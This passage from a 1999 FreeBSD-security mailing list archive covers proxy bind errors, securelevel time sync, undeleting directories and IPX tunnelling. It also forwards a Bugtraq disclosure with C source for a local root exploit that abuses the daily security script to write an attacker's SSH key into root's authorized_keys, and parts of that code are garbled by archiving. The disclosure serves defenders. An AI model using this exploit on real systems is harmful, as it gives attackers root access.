that his eyes are almost completely blurry from working all night... If that doesn't work, I'm at a bit of a loss. I don't have access to a FreeBSD machine right now and thus can't bang on it. However, if you (or anyone) has such a system on the Internet on which they can give me a temporary login (and gcc, of course), I can take a look and see for myself. Or maybe someone else has already gotten it working? Actually, I've gotten very little response from people regarding the patch working on different operating systems. Since this is going out to the list, if any of you have gotten it working, could you please let me know what platform/OS and any changes you had to make? - Bill --- William L. Hamlin Systems Architect Convergent Networking Systems, Inc. On Wed, 25 Aug 1999, Michael Williams wrote: > [To be removed from this list send the message "unsubscribe fwtk-users" in the > BODY of a mail message to majordomo@ex.tis.com.] > > Has anyone used the really cool fwtk IPBind patch for daemon mode plug-gw > proxies with success on any of the freeBSD OS version's?. > > I have found it to work exactly as expected under RedHat Linux 6.0 as per > the syslog entries at the end of this mail. > > The documentation clearly states, > This patch has been tested and verified on the following systems: > > Solaris 2.5.1 (sparc) > Solaris 2.5 (x86) > > So I am not expecting to much as it does work on my test RedHat server just > not on the freeBSD 3.2 server which happens to be the gateway I want to use > this on (: > > However looking through the source code I can see that under freeBSD it > makes it through the create socket call, then the setsockopt call OK but > fails on the Bind seeming to not like the address. > I am not sure how to figure out if the problem is an access rights issue or > perhaps an address:port format issue. > > A point worth noting is that when configured to bind the port only, then > the bind is fine and in fact the proxy works as expected and when run in > daemon mode sets up a listener on *.port for all interfaces. > > I do have an IPFW rulebase loaded on the freeBSD server which does not seem > to interfere as the plug-gw behaves fine as bind to port only. > > Looking through my 4.4BSD books I can see that the bind call is quite happy > to bind the address of 0/ and decide on the fly the correct interface and > this made me wonder if it wanted to bind to an interface address rather than > an IP address?. > > I am starting the proxy with the following, > /usr/local/etc/plug-gw -daemon 192.168.30.3:80 -name plug-http > > Here are the syslog entries from both servers. > Hope they come through legible. > > redhat 6 linux 2.2.15-22 kernel. > Aug 23 18:26:17 xmailgate plug-gw[615]: Starting daemon mode on ip > 192.168.30.3(192.168.30.3), port 80 > . > . > Aug 25 05:10:54 xmailgate plug-gw[1139]: HERE!!! av[0] = 80 > Aug 25 05:10:54 xmailgate last message repeated 3 times > Aug 25 05:10:54 xmailgate plug-gw[1139]: YO!!! localip = 192.168.30.3 > Aug 25 05:10:54 xmailgate plug-gw[1139]: connect > host=sdakx0.xx.xx/192.168.30.10 destination=10.0.30.4/8080 > > > freebsd 3.2 kernel > Aug 24 06:13:19 sd172-lx52 plug-gw[1810]: Starting daemon mode on ip > 172.16.30.4 > (172.16.30.4), port 81 > Aug 24 06:13:19 sd172-lx52 plug-gw[1810]: Failed to bind port 81, Can't > assign requested address > > Any helpfull comment would be appreciated. > Thanks, > Mike. > > Michael Williams > Software Dynamics > mailto:sdynamic@xtra.co.nz > http://www.voyager.co.nz/~michaelw > cell ph: 025 995 914 > ph: +64 9 2744876 > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 25 9:17:17 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.vr.IN-Berlin.DE (gnu.in-berlin.de [192.109.42.4]) by hub.freebsd.org (Postfix) with ESMTP id D073E15099 for ; Wed, 25 Aug 1999 09:16:43 -0700 (PDT) (envelope-from server.nostromo.in-berlin.de!ripley@servicia.in-berlin.de) Received: from uriela.in-berlin.de (IDENT:root@servicia.in-berlin.de [192.109.42.145]) by mail.vr.IN-Berlin.DE (8.9.3/8.9.3) with ESMTP id SAA23794 for ; Wed, 25 Aug 1999 18:15:27 +0200 (CEST) (envelope-from server.nostromo.in-berlin.de!ripley@servicia.in-berlin.de) Received: by uriela.in-berlin.de (Smail-3.2.0.101 1997-Dec-17 #1) id m11JgBN-000VQyC; Wed, 25 Aug 1999 18:45:53 +0200 (CEST) Received: (from ripley@localhost) by server.nostromo.in-berlin.de (8.9.3/8.9.3) id XAA72728 for freebsd-security@FreeBSD.ORG; Tue, 24 Aug 1999 23:59:09 +0200 (CEST) (envelope-from ripley) Date: Tue, 24 Aug 1999 23:59:08 +0200 From: "H. Eckert" To: freebsd-security@FreeBSD.ORG Subject: Re: Securelevel 3 and setting time Message-ID: <19990824235908.B70739@server.nostromo.in-berlin.de> References: <19990822112923.6666.qmail@alice.gba.oz.au> <19990822194140.623D211@woodstock.monkey.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.6i X-Old-Subject: Re: Securelevel 3 ant setting time In-Reply-To: <19990822194140.623D211@woodstock.monkey.net>; from Jon Hamilton on Sun, Aug 22, 1999 at 02:41:40PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Quoting Jon Hamilton (hamilton@pobox.com): > - some people don't care about "the" correct time, as long as their > machines all agree about what they _think_ the time is (e.g. to keep > NFS happy on an internal network) Additionally it depends quite a lot on how correct you want to be. For most home users (that is, those people who are not permanently connected to the net) it is absolutely sufficient to have one local time master that all other machines sync themselves to (hey, a lot of people even may have only one machine at all ;-) and that syncs to the correct time once in a while when it's connected to the net. This is what I do (my server's running xntpd in behalf of the other machines and updates its clock during the daily poll for mail) and it's what the fellow does who started this whole thread in the first place. The only problem being he put his server into an elevated secure level and synchronized the clock rarely enough to drift too far away to be corrected at that secure level in one step. Now, anybody who's got a real reason to keep their time more accurate than that should be obliged to invest into that accuracy. Either by providing a different source for "the" time or by configuring the machine to take care of it by synching itself more often. Radio synched clocks to be connected to a serial port aren't expensive. Activating the network connection once or twice an hour instead of once a day isn't that expensive either. You get what you pay for and YMMV. The main question we haven't come to a conclusion so far is what action should(n't) be taken as a possible solution for the "rarely synched clock in an elevated secure level" scenario. - Loosen security and allow for bigger time jumps ? - Forcing the admin to sync the clock more often ? - Enabling ntpdate to distribute the time adjustments into several smaller jumps instead of a big leap ? Greetings, Ripley To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 25 13:48:32 1999 Delivered-To: freebsd-security@freebsd.org Received: from mta2-rme.xtra.co.nz (mta2-rme.xtra.co.nz [203.96.92.3]) by hub.freebsd.org (Postfix) with ESMTP id 574A614CFF for ; Wed, 25 Aug 1999 13:48:24 -0700 (PDT) (envelope-from sdynamic@xtra.co.nz) Received: from sdk6 ([210.55.122.60]) by mta2-rme.xtra.co.nz (InterMail v4.01.01.00 201-229-111) with SMTP id <19990825205024.FLHK2478302.mta2-rme@sdk6>; Thu, 26 Aug 1999 08:50:24 +1200 Message-ID: <004a01beef3a$ed56c160$061ea8c0@sdk6.sd.co.nz> From: "Michael Williams" To: "William L. Hamlin" Cc: , Subject: Re: IPBind patch for fwtk on freeBSD 3.2 Date: Thu, 26 Aug 1999 08:46:36 +1200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.3110.5 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Bill, Thanks for your quick response. Sorry for my slow reply.. NZ time it way differant. If socket programming is bordering off corect topic for freebsd-security perhaps one of the freeBSD team could let me know in which case we could post the resolution only to freebsd-security :) > >Which version of IPBind are you using? If you are using anything older >than 1.2, get the newest one - that will probably be your problem. There >are known issues with earlier versions attempting to bind specific IP >addresses on some systems. > Oops, silly of me to include the version of everything but the IPBind code. Version 1.2 already (: > >My next suggestion would be to verify that the IP address you are >specifying (172.16.30.4) is indeed the one that you want to use and that >it is correctly configured on the local machine. I know this sounds >basic, but most of the problem e-mails I get regarding the patch end up >being this very problem. A good sign of a computer nut is that his eyes >are almost completely blurry from working all night... > Good suggestion just the same, I can bind the plug-gw by port only and connect via the IP address in question. First I started with an alias IP & then moved on to using the base adapter IP which I know works. An interesting direct reply I had suggested that FreeBSD requires entire sockaddr_in structure to be bzero'ed before assigning address. In the mean time I have found the Socket-address template structure and a sample diagram for the Internet-domain socket name ( Design & Implementation 4.4 BSD ) showing the layout as follows: sa_len, sa_family, sa_data 1-byte, 1-byte, variable-length Which in this case should be: sin_len,AF_INET,sin_port,sin_addr,sin_zero My 'c' code is very rusty but I will follow this up. I use freeBSD on a number of production servers in various secure roles and find it to be the most interesting, fun and stable OS of any I have ever used :) Mike. Michael Williams Software Dynamics mailto:sdynamic@xtra.co.nz http://www.voyager.co.nz/~michaelw cell ph: 025 995 914 ph: +64 9 2744876 >> >> Has anyone used the really cool fwtk IPBind patch for daemon mode plug-gw >> proxies with success on any of the freeBSD OS version's?. >> >> I have found it to work exactly as expected under RedHat Linux 6.0 as per >> the syslog entries at the end of this mail. >> >> The documentation clearly states, >> This patch has been tested and verified on the following systems: >> >> Solaris 2.5.1 (sparc) >> Solaris 2.5 (x86) >> >> So I am not expecting to much as it does work on my test RedHat server just >> not on the freeBSD 3.2 server which happens to be the gateway I want to use >> this on (: >> >> However looking through the source code I can see that under freeBSD it >> makes it through the create socket call, then the setsockopt call OK but >> fails on the Bind seeming to not like the address. >> I am not sure how to figure out if the problem is an access rights issue or >> perhaps an address:port format issue. >> >> A point worth noting is that when configured to bind the port only, then >> the bind is fine and in fact the proxy works as expected and when run in >> daemon mode sets up a listener on *.port for all interfaces. >> >> I do have an IPFW rulebase loaded on the freeBSD server which does not seem >> to interfere as the plug-gw behaves fine as bind to port only. >> >> Looking through my 4.4BSD books I can see that the bind call is quite happy >> to bind the address of 0/ and decide on the fly the correct interface and >> this made me wonder if it wanted to bind to an interface address rather than >> an IP address?. >> >> I am starting the proxy with the following, >> /usr/local/etc/plug-gw -daemon 192.168.30.3:80 -name plug-http >> >> Here are the syslog entries from both servers. >> Hope they come through legible. >> >> redhat 6 linux 2.2.15-22 kernel. >> Aug 23 18:26:17 xmailgate plug-gw[615]: Starting daemon mode on ip >> 192.168.30.3(192.168.30.3), port 80 >> . >> . >> Aug 25 05:10:54 xmailgate plug-gw[1139]: HERE!!! av[0] = 80 >> Aug 25 05:10:54 xmailgate last message repeated 3 times >> Aug 25 05:10:54 xmailgate plug-gw[1139]: YO!!! localip = 192.168.30.3 >> Aug 25 05:10:54 xmailgate plug-gw[1139]: connect >> host=sdakx0.xx.xx/192.168.30.10 destination=10.0.30.4/8080 >> >> >> freebsd 3.2 kernel >> Aug 24 06:13:19 sd172-lx52 plug-gw[1810]: Starting daemon mode on ip >> 172.16.30.4 >> (172.16.30.4), port 81 >> Aug 24 06:13:19 sd172-lx52 plug-gw[1810]: Failed to bind port 81, Can't >> assign requested address >> >> Any helpfull comment would be appreciated. >> Thanks, >> Mike. >> >> Michael Williams >> Software Dynamics >> mailto:sdynamic@xtra.co.nz >> http://www.voyager.co.nz/~michaelw >> cell ph: 025 995 914 >> ph: +64 9 2744876 >> > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 25 15: 0:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id 9B24114F66 for ; Wed, 25 Aug 1999 15:00:24 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) Received: from localhost (jkh@localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id OAA17000; Wed, 25 Aug 1999 14:57:29 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) To: Uldis Kuplis Cc: freebsd-security@FreeBSD.ORG Subject: Re: undelete In-reply-to: Your message of "Wed, 25 Aug 1999 10:54:34 +0300." <37C3A13A.2A94EDFB@kb.lkb.bkc.lv> Date: Wed, 25 Aug 1999 14:57:28 -0700 Message-ID: <16996.935618248@localhost> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > User, who was admin, and had wheel group, > deleted /bin; /etc; /var directories from my FreeBSD 3.1. Don't let users, especially users like this, do that. That's the first lesson to be learned here. :) > Can I undelete these directories? > If it possible, then how to do it? No, you should simply reinstall them from a FreeBSD bin distribution (it's just a split, gzip'd tar file and you should be able to figure out how to extract parts of it by reading the tar man page). Directories and files which have been deleted in FreeBSD don't go to a trashcan, they go to the great bit-haven in the sky immediately and there's really no way to bring them back unless you're a Unix filesystem internals whiz and can use fsdb blindfolded. That's definitely not a practical solution in this case and so you'll have to simply restore them. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 25 18:40:11 1999 Delivered-To: freebsd-security@freebsd.org Received: from maxim.gba.oz.au (gba.tmx.com.au [203.9.155.249]) by hub.freebsd.org (Postfix) with SMTP id 5AD6B152A9 for ; Wed, 25 Aug 1999 18:39:47 -0700 (PDT) (envelope-from gjb-freebsd@gba.oz.au) Received: (qmail 4234 invoked from network); 26 Aug 1999 06:39:57 +1000 Received: from alice.gba.oz.au (192.168.1.11) by maxim.gba.oz.au with SMTP; 26 Aug 1999 06:39:57 +1000 Received: (qmail 646 invoked by uid 1001); 26 Aug 1999 06:39:56 +1000 Message-ID: <19990825203955.645.qmail@alice.gba.oz.au> X-Posted-By: GBA-Post 1.03 20-Sep-1998 X-PGP-Fingerprint: 5A91 6942 8CEA 9DAB B95B C249 1CE1 493B 2B5A CE30 Date: Thu, 26 Aug 1999 06:39:55 +1000 From: Greg Black To: "H. Eckert" Cc: freebsd-security@FREEBSD.ORG Subject: Re: Securelevel 3 and setting time References: <19990822112923.6666.qmail@alice.gba.oz.au> <19990822194140.623D211@woodstock.monkey.net> <19990824235908.B70739@server.nostromo.in-berlin.de> In-reply-to: <19990824235908.B70739@server.nostromo.in-berlin.de> of Tue, 24 Aug 1999 23:59:08 +0200 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > The main question we haven't come to a conclusion so far is > what action should(n't) be taken as a possible solution for the > "rarely synched clock in an elevated secure level" scenario. > > - Loosen security and allow for bigger time jumps ? > - Forcing the admin to sync the clock more often ? > - Enabling ntpdate to distribute the time adjustments into > several smaller jumps instead of a big leap ? Surely the simple solution here is to build ntpdate so that it always uses adjtime(2). -- Greg Black -- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 25 18:40:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from alcanet.com.au (border.alcanet.com.au [203.62.196.10]) by hub.freebsd.org (Postfix) with ESMTP id CC0F015C1F for ; Wed, 25 Aug 1999 18:40:24 -0700 (PDT) (envelope-from jeremyp@gsmx07.alcatel.com.au) Received: by border.alcanet.com.au id <40335>; Thu, 26 Aug 1999 11:38:51 +1000 Date: Thu, 26 Aug 1999 11:39:57 +1000 From: Peter Jeremy Subject: Re: undelete In-reply-to: <16996.935618248@localhost> To: uldisk@kb.lkb.bkc.lv Cc: freebsd-security@FreeBSD.ORG Message-Id: <99Aug26.113851est.40335@border.alcanet.com.au> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Jordan K. Hubbard" wrote: >> User, who was admin, and had wheel group, >> deleted /bin; /etc; /var directories from my FreeBSD 3.1. ... >No, you should simply reinstall them from a FreeBSD bin distribution It's worth point out that it isn't quite this simple. For /bin it'll work. In /etc, you'll need to go through and reconfigure most of the files (though for a simple setup, this should be limited to rc.conf, fstab, hosts, group, resolv.conf, exports and aliases). When you're rebuilding /etc/group, remember to leave that user out of wheel :-). /var is the most serious. Basically all you'll get out of the distribution is a set of empty directories. The contents are virtually all system dependent. In particular, you'll have lost records of what packages (if any) you've installed, users' mail (including any queued mail), games scores, cron jobs, at jobs, accounting information, backups of most of the critical files from /etc, etc. If someone would like to fix LFS so it works, creating an `undelete' command becomes much simpler... Peter To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 25 19:51:25 1999 Delivered-To: freebsd-security@freebsd.org Received: from cx33363-a.dt1.sdca.home.com (cx33363-a.dt1.sdca.home.com [24.0.129.48]) by hub.freebsd.org (Postfix) with ESMTP id 20F2214E94 for ; Wed, 25 Aug 1999 19:51:23 -0700 (PDT) (envelope-from obecian@cx33363-a.dt1.sdca.home.com) Received: (from obecian@localhost) by cx33363-a.dt1.sdca.home.com (8.9.3/8.9.3) id TAA05191 for freebsd-security@freebsd.org; Wed, 25 Aug 1999 19:50:48 -0700 (PDT) (envelope-from obecian) Date: Wed, 25 Aug 1999 19:50:48 -0700 (PDT) From: obecian Message-Id: <199908260250.TAA05191@cx33363-a.dt1.sdca.home.com> To: freebsd-security@freebsd.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org unsubscribe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 25 19:53:45 1999 Delivered-To: freebsd-security@freebsd.org Received: from cx33363-a.dt1.sdca.home.com (cx33363-a.dt1.sdca.home.com [24.0.129.48]) by hub.freebsd.org (Postfix) with ESMTP id A41CD15411 for ; Wed, 25 Aug 1999 19:53:43 -0700 (PDT) (envelope-from obecian@cx33363-a.dt1.sdca.home.com) Received: (from obecian@localhost) by cx33363-a.dt1.sdca.home.com (8.9.3/8.9.3) id TAA05240 for freebsd-security@freebsd.org; Wed, 25 Aug 1999 19:53:44 -0700 (PDT) (envelope-from obecian) Date: Wed, 25 Aug 1999 19:53:44 -0700 (PDT) From: obecian Message-Id: <199908260253.TAA05240@cx33363-a.dt1.sdca.home.com> To: freebsd-security@freebsd.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org unsubscribe freebsd-security To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 25 20: 8:42 1999 Delivered-To: freebsd-security@freebsd.org Received: from pop3-3.enteract.com (pop3-3.enteract.com [207.229.143.32]) by hub.freebsd.org (Postfix) with SMTP id D91A514E94 for ; Wed, 25 Aug 1999 20:08:40 -0700 (PDT) (envelope-from dscheidt@enteract.com) Received: (qmail 95142 invoked from network); 26 Aug 1999 03:06:15 -0000 Received: from shell-2.enteract.com (dscheidt@207.229.143.41) by pop3-3.enteract.com with SMTP; 26 Aug 1999 03:06:15 -0000 Date: Wed, 25 Aug 1999 22:06:15 -0500 (CDT) From: David Scheidt To: Peter Jeremy Cc: uldisk@kb.lkb.bkc.lv, freebsd-security@FreeBSD.ORG Subject: Re: undelete In-Reply-To: <99Aug26.113851est.40335@border.alcanet.com.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 26 Aug 1999, Peter Jeremy wrote: > If someone would like to fix LFS so it works, creating an `undelete' > command becomes much simpler... > What, exactly, is broken with LFS? Or, at least, when did it get broken? David To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 25 20:37:11 1999 Delivered-To: freebsd-security@freebsd.org Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id 6342D14CF0 for ; Wed, 25 Aug 1999 20:37:10 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) Received: from localhost (jkh@localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id UAA01204; Wed, 25 Aug 1999 20:36:47 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) To: David Scheidt Cc: Peter Jeremy , uldisk@kb.lkb.bkc.lv, freebsd-security@FreeBSD.ORG Subject: Re: undelete In-reply-to: Your message of "Wed, 25 Aug 1999 22:06:15 CDT." Date: Wed, 25 Aug 1999 20:36:47 -0700 Message-ID: <1201.935638607@localhost> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org It never actually worked is the actual case. > On Thu, 26 Aug 1999, Peter Jeremy wrote: > > > If someone would like to fix LFS so it works, creating an `undelete' > > command becomes much simpler... > > > What, exactly, is broken with LFS? Or, at least, when did it get broken? > > David > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 25 21: 2:55 1999 Delivered-To: freebsd-security@freebsd.org Received: from pop3-3.enteract.com (pop3-3.enteract.com [207.229.143.32]) by hub.freebsd.org (Postfix) with SMTP id DCB5C15AA1 for ; Wed, 25 Aug 1999 21:02:41 -0700 (PDT) (envelope-from dscheidt@enteract.com) Received: (qmail 22629 invoked from network); 26 Aug 1999 04:01:59 -0000 Received: from shell-2.enteract.com (dscheidt@207.229.143.41) by pop3-3.enteract.com with SMTP; 26 Aug 1999 04:01:59 -0000 Date: Wed, 25 Aug 1999 23:01:59 -0500 (CDT) From: David Scheidt To: "Jordan K. Hubbard" Cc: Peter Jeremy , freebsd-security@FreeBSD.ORG Subject: Re: undelete In-Reply-To: <1201.935638607@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 25 Aug 1999, Jordan K. Hubbard wrote: > It never actually worked is the actual case. That is what I expected. It works in NetBSD, doesn't it? David Scheidt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 25 21:14:58 1999 Delivered-To: freebsd-security@freebsd.org Received: from alcanet.com.au (border.alcanet.com.au [203.62.196.10]) by hub.freebsd.org (Postfix) with ESMTP id B3399153CC for ; Wed, 25 Aug 1999 21:14:49 -0700 (PDT) (envelope-from jeremyp@gsmx07.alcatel.com.au) Received: by border.alcanet.com.au id <40346>; Thu, 26 Aug 1999 14:11:43 +1000 Date: Thu, 26 Aug 1999 14:12:46 +1000 From: Peter Jeremy Subject: Re: undelete In-reply-to: To: dscheidt@enteract.com Cc: freebsd-security@FreeBSD.ORG Message-Id: <99Aug26.141143est.40346@border.alcanet.com.au> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org David Scheidt wrote: >What, exactly, is broken with LFS? Or, at least, when did it get broken? To expand on Jordan's response: It was removed at the end of January 1998 with the following commit message: }Retire LFS. } }If you want to play with it, you can find the final version of the }code in the repository the tag LFS_RETIREMENT. } }If somebody makes LFS work again, adding it back is certainly }desireable, but as it is now nobody seems to care much about it, }and it has suffered considerable bitrot since its somewhat haphazard }integration. } }R.I.P Further discussion on this topic probably belongs in freebsd-fs, rather than here. Peter To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 26 4: 6:11 1999 Delivered-To: freebsd-security@freebsd.org Received: from mirage.nlink.com.br (mirage.nlink.com.br [200.249.195.3]) by hub.freebsd.org (Postfix) with ESMTP id E53DD153F3 for ; Thu, 26 Aug 1999 04:05:49 -0700 (PDT) (envelope-from Mlobo.Sup.EAR@ear.com.br) Received: from ear.com.br (ppp-ear.nlink.com.br [200.249.198.33]) by mirage.nlink.com.br (8.9.3/8.9.1) with ESMTP id IAA29699 for ; Thu, 26 Aug 1999 08:04:18 -0300 (EST) Message-Id: <199908261104.IAA29699@mirage.nlink.com.br> Received: from EARMDPA01/SpoolDir by ear.com.br (Mercury 1.45); 26 Aug 99 08:05:55 GMT-3 Received: from SpoolDir by EARMDPA01 (Mercury 1.45); 26 Aug 99 08:03:58 GMT-3 From: "Mario de Oliveira Lobo Neto" Organization: American School of Recife - Brazil To: freebsd-security@FreeBSD.ORG Date: Thu, 26 Aug 1999 08:03:45 -0300 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: VPN ??? X-mailer: Pegasus Mail for Win32 (v3.11) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello; I would like to know if anybody on this list could help me to set up the following arrangement: REMOTE WorkStation (Novell Client / win 98 - IPX) | | | <- Internet (Windows VPN ??) | FREEBSD 2.2.8 (ipfw running) | | <- Currently, only TCP/IP here. | (Thinking about a second net board | just for an IPX link here) | NOVELL 4.11 ----------------------- Local LAN (IPX only) (IP/IPX gateway running) Yes, the attempt is to login to novell using the internet as a tunnel for IPX packets. Anyone knows if this is possible ? Thanks in advance, Mario Lobo - *** Mario Lobo - mlobo@ear.com.br *** American School of Recife To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 26 9:47:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from forrie.net (forrie.net [216.67.12.69]) by hub.freebsd.org (Postfix) with ESMTP id 5289C15ED5 for ; Thu, 26 Aug 1999 09:47:12 -0700 (PDT) (envelope-from forrie@forrie.com) Received: from boomer (boomer.navinet.net [216.67.12.90]) by forrie.net (8.9.3/8.9.3) with ESMTP id MAA08535 for ; Thu, 26 Aug 1999 12:47:03 -0400 (EDT) Message-Id: <4.2.0.58.19990826124527.00aa85b0@216.67.12.69> X-Sender: forrie@216.67.12.69 X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58 Date: Thu, 26 Aug 1999 12:45:37 -0400 To: freebsd-security@freebsd.org From: Forrest Aldrich Subject: Fwd: FreeBSD (and other BSDs?) local root explot Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Approved-By: aleph1@SECURITYFOCUS.COM >Delivered-To: bugtraq@securityfocus.com >X-Mailer: XFMail 1.3 [p0] on Linux >X-SMS: +48601383657@text.plusgsm.pl >X-PGP: PGP key on WWW or finger >X-Operating-System: FreeBSD 3.2-STABLE (i386) >Date: Tue, 24 Aug 1999 23:47:05 +0200 >Reply-To: Przemyslaw Frasunek >Sender: Bugtraq List >From: Przemyslaw Frasunek >Organization: Lubelska Grupa Uzytkownikow BSD >Subject: FreeBSD (and other BSDs?) local root explot >X-To: bugtraq@securityfocus.com >To: BUGTRAQ@SECURITYFOCUS.COM > >-----BEGIN PGP SIGNED MESSAGE----- >Hash: SHA1 > >/* > > (c) 1999 babcia padlina ltd. > > bug in fts_print function allows to overwrite any file in system, when > running /etc/security script (executed from 'daily' scripts). > > affected systems: > - freebsd (all versions) > - probably openbsd/netbsd > > fix: > - limit root's coredump size > - patch libc > >*/ > >#include >#include >#include >#include >#include > >#define STRING "\nYOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!\n" >#define FILE "/root/.ssh/authorized_keys" >#define CORE "find.core" >#define DEPTH 300 >#define BUFSIZE 250 > >int makedir(dir, linkfrom, linkto) >char *dir, *linkfrom, *linkto; >{ > > if (mkdir(dir, (S_IRWXU | S_IRWXG | S_IRWXO))) > return -1; > > if (chdir(dir)) > return -1; > > if (symlink(linkfrom, linkto) < 0) > return -1; > > return 0; >} > > >int main(argc, argv) >int argc; >char **argv; >{ > int i = 0; > char pid[10], buf[BUFSIZE]; > > sprintf(pid, "%d", getpid()); > > if (mkdir(pid, (S_IRWXU | S_IRWXG | S_IRWXO))) > { > perror("mkdir()"); > return -1; > } > > if (chdir(pid)) > { > perror("chdir()"); > return -1; > } > > bzero(buf, BUFSIZE); > memset(buf, 0x41, BUFSIZE-1); > > for(i=0;i { > if (makedir(STRING, FILE, CORE) < 0) > { > perror("makedir()"); > return -1; > } > > if(makedir(buf, FILE, CORE) < 0) > { > perror("makedir()"); > return -1; > } > } > > return 0; >} > >- --- >* Fido: 2:480/124 ** WWW: FreeBSD.lublin.pl/~venglin ** GSM: +48-601-383657 * >* Inet: venglin@FreeBSD.lublin.pl ** PGP: D48684904685DF43 EA93AFA13BE170BF * > >-----BEGIN PGP SIGNATURE----- >Version: PGPfreeware 5.0i for non-commercial use >Charset: noconv > >iQA/AwUBN8MS2P6SPyHAYTvjEQLK5ACfZ1cVpjGzqIF3bTsIX/wrahJOqy4AoOEx >JkgnTo+Dk3QUFGT2bZdmxx9S >=Tyvh >-----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 26 9:51:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from forty-two.egroups.net (adsl-63-193-211-127.dsl.snfc21.pacbell.net [63.193.211.127]) by hub.freebsd.org (Postfix) with ESMTP id 8FD3815C6F; Thu, 26 Aug 1999 09:51:17 -0700 (PDT) (envelope-from gsutter@forty-two.egroups.net) Received: (from gsutter@localhost) by forty-two.egroups.net (8.9.3/8.9.2) id JAA38551; Thu, 26 Aug 1999 09:49:10 -0700 (PDT) (envelope-from gsutter) Date: Thu, 26 Aug 1999 09:49:10 -0700 From: Gregory Sutter To: security-officer@freebsd.org Cc: freebsd-security@freebsd.org Subject: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot] Message-ID: <19990826094910.F20512@forty-two.egroups.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i Organization: Zer0 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This claims to describe a FreeBSD root exploit, and was just posted to BugTraq. ----- Forwarded message from Przemyslaw Frasunek ----- Message-ID: Date: Tue, 24 Aug 1999 23:47:05 +0200 Sender: Bugtraq List From: Przemyslaw Frasunek Subject: 